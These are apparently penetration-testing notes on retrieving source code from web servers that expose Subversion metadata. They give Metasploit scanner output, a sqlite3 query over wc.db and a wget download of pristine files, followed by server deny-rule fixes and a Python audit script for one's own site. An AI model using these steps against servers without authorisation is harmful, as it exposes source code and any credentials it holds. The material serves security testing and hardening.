Check for .svn/entries files
Walk svn chain to retrieve source
Example:
http://somedomain.com/.svn/text-base/index.php.svn-base
http://somedomain.com/.svn/entries
Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_scanner
msf auxiliary(svn_scanner) > run
[*] Using code '404' as not found.
[+] [1.2.3.52:80] SVN Entries file found.
[*] [1.2.3.52] dir CURRENT [dw394]
[*] - Trying to get file rss2html2.php source code.
[*] - Location: /.svn/text-base/rss2html2.php.svn-base
[*]
Fatal error: Call to undefined function FeedForAll_scripts_readFile() in /usr/local/apache2-marketing/htdocs/.svn/text-base/rss2html2.php.svn-base on line 772
---SNIP---
[*] Done. 175 records.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Unfortunately web servers will usually catch the PHP and try to render it for you :-(
Once you have the source, look for config files or other interesting things in the source code.
Subversion 1.7 and later
Working copy and changes stored in a sqlite database
Example:
http://www.somedomain.com/.svn/wc.db
Metasploit Auxiliary Module:
auxiliary/scanner/http/svn_wcdb_scanner
From the SANS link below, an example of pulling out files on the server:
"We have the file name and the SHA1 used by Subversion. With a little SQL-Kung-Fu, we can create a mapping of files used by the application and the files as stored by Subversion."
$ sqlite3 wc.db 'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES;'
index.php|.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
scripts/menu.js|.svn/pristine/fa/fabeb3ba6a96cf0cbcad1308abdbe0c2427eeebf.svn-base
style/style.js|.svn/pristine/2c/2cc5590e0ba024c3db77a13896da09b39ea74799.svn-base
...
Anything with a .svn/pristine should be downloadable:
$ wget -O - http://www.sometarget.tgt/.svn/pristine/4e/4e6a225331f9ae872db25a8f85ae7be05cea6d51.svn-base
<?php
// This is the index.php file
...
Great reference for the above:
http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us
Other blog posts on the subject:
https://blog.netspi.com/parsing-svn-entries-files-with-powershell/
Fixes (quick Google searches, didn't test)
Apache
or
RedirectMatch permanent .*\.(svn|git|hg|bzr|cvs)/.* /
nginx
location ~ /\.svn/ {
    deny all;
}
.htaccess
RedirectMatch 404 (?i)\.svn
IIS
couple answers here, although none marked as "the answer"
http://serverfault.com/questions/23340/ignoring-svn-directories-under-iis
also http://www.petefreitag.com/item/823.cfm (Great site BTW)
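To go with the fixes above, a local check you can run against your own document root before deploying. This is an added example, not code from the original post or the linked references: it reuses the wc.db query shown earlier and lists which files each .svn directory would expose. The function names and the finding layout are assumptions made for this sketch.

```python
import os
import pathlib
import sqlite3
import sys

# Same mapping as the sqlite3 query above; a checksum looks like "$sha1$<hex>".
PRISTINE_SQL = (
    "SELECT local_relpath, '.svn/pristine/' || substr(checksum, 7, 2) || '/'"
    " || substr(checksum, 7) || '.svn-base' FROM NODES WHERE checksum IS NOT NULL"
)

def pristine_map(wc_db):
    """Return [(local_relpath, pristine_path)] from a Subversion 1.7+ wc.db."""
    uri = pathlib.Path(wc_db).resolve().as_uri() + "?mode=ro"  # never write to it
    db = sqlite3.connect(uri, uri=True)
    try:
        return db.execute(PRISTINE_SQL).fetchall()
    except sqlite3.DatabaseError:
        return []  # unreadable, or not a working-copy database
    finally:
        db.close()

def audit_webroot(root):
    """Walk a local document root and report source recoverable via .svn."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if ".svn" not in dirnames:
            continue
        dirnames.remove(".svn")  # report the metadata dir, do not descend into it
        svn = os.path.join(dirpath, ".svn")
        if os.path.isfile(os.path.join(svn, "wc.db")):  # 1.7+ (checked first)
            fmt = "wc.db"
            files = [(rel, p) for rel, p in pristine_map(os.path.join(svn, "wc.db"))
                     if os.path.isfile(os.path.join(dirpath, p))]
        elif os.path.isfile(os.path.join(svn, "entries")):  # pre-1.7 layout
            fmt = "entries"
            base = os.path.join(svn, "text-base")
            names = sorted(os.listdir(base)) if os.path.isdir(base) else []
            files = [(n[:-len(".svn-base")], ".svn/text-base/" + n)
                     for n in names if n.endswith(".svn-base")]
        else:
            continue
        findings.append({"dir": dirpath, "format": fmt, "files": files})
    return findings

if __name__ == "__main__":
    for f in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%s: %s format, %d file(s) exposed" % (f["dir"], f["format"], len(f["files"])))
        for rel, path in f["files"]:
            print("    %s <- %s" % (rel, path))
```

Any finding means the deploy step should export a clean tree or strip the .svn directory, in addition to the server-side deny rules.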